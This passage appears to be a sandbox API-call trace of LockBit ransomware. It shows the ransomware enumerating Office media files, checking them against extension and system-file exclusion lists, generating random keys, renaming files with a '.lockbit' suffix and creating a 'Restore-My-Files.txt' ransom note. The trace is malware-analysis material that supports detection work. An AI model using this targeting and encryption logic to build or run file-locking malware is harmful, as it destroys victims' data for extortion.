(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0206.058] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0206.059] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0206.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.059] malloc (_Size=0xae) returned 0x1fa2ed8 [0206.059] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0206.060] free (_Block=0x1fa2ed8) [0206.060] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14882_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0206.060] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0206.060] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0206.060] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde300, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca36b40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1ebde300, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x144, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14883_.GIF", cAlternateFileName="")) returned 1 [0206.060] lstrcmpiW (lpString1=".", lpString2="BD14883_.GIF") returned -1 [0206.060] lstrcmpiW (lpString1="..", lpString2="BD14883_.GIF") returned -1 [0206.060] PathFindExtensionW (pszPath="BD14883_.GIF") returned=".GIF" [0206.061] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0206.061] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0206.061] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0206.062] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0206.062] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0206.062] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0206.062] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14883_.GIF") returned 1 [0206.062] lstrcmpiW (lpString1="ntldr", lpString2="BD14883_.GIF") returned 1 [0206.062] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14883_.GIF") returned 1 [0206.062] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14883_.GIF") returned 1 [0206.062] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14883_.GIF") returned -1 [0206.062] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14883_.GIF") returned 1 [0206.062] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14883_.GIF") returned 1 [0206.063] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0206.063] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF") returned=".GIF" [0206.063] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0206.063] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0206.063] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0206.064] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0206.064] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0206.064] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0206.064] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0206.064] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF.lockbit") returned 76 [0206.064] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14883_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0206.064] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0206.064] malloc (_Size=0x40068) returned 0x3f70048 [0206.064] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=324) returned 1 [0206.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.065] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0206.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.065] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0206.065] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0206.066] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.066] malloc (_Size=0xae) returned 0x1fa2ed8 [0206.066] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0206.067] free (_Block=0x1fa2ed8) [0206.067] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14883_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0206.067] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0206.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0206.067] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73615e00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca5cca0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x73615e00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14996_.GIF", cAlternateFileName="")) returned 1 [0206.067] lstrcmpiW (lpString1=".", lpString2="BD14996_.GIF") returned -1 [0206.067] lstrcmpiW (lpString1="..", lpString2="BD14996_.GIF") returned -1 [0206.067] PathFindExtensionW (pszPath="BD14996_.GIF") returned=".GIF" [0206.068] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0206.068] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.068] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0206.069] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0206.069] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0206.069] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0206.069] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14996_.GIF") returned 1 [0206.069] lstrcmpiW (lpString1="ntldr", lpString2="BD14996_.GIF") returned 1 [0206.069] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14996_.GIF") returned 1 [0206.069] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14996_.GIF") returned 1 [0206.069] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14996_.GIF") returned -1 [0206.070] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14996_.GIF") returned 1 [0206.070] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14996_.GIF") returned 1 [0206.070] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0206.070] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF") returned=".GIF" [0206.070] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0206.070] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0206.070] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0206.070] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0206.070] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0206.070] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0206.070] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0206.070] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0206.070] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0206.071] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0206.071] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0206.071] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0206.071] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0206.071] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0206.071] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0206.071] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0206.071] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF.lockbit") returned 76 [0206.071] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14996_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0206.071] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0206.071] malloc (_Size=0x40068) returned 0x3e70008 [0206.072] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=727) returned 1 [0206.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0206.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0206.072] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0209.304] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.304] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.304] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.305] free (_Block=0x1fa2ed8) [0209.305] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14996_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.305] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.305] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.305] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73615e00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca5cca0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x73615e00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x2ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14997_.GIF", cAlternateFileName="")) returned 1 [0209.306] lstrcmpiW (lpString1=".", lpString2="BD14997_.GIF") returned -1 [0209.306] lstrcmpiW (lpString1="..", lpString2="BD14997_.GIF") returned -1 [0209.306] PathFindExtensionW (pszPath="BD14997_.GIF") returned=".GIF" [0209.306] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.306] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.306] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.307] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.307] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.307] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".hlp", 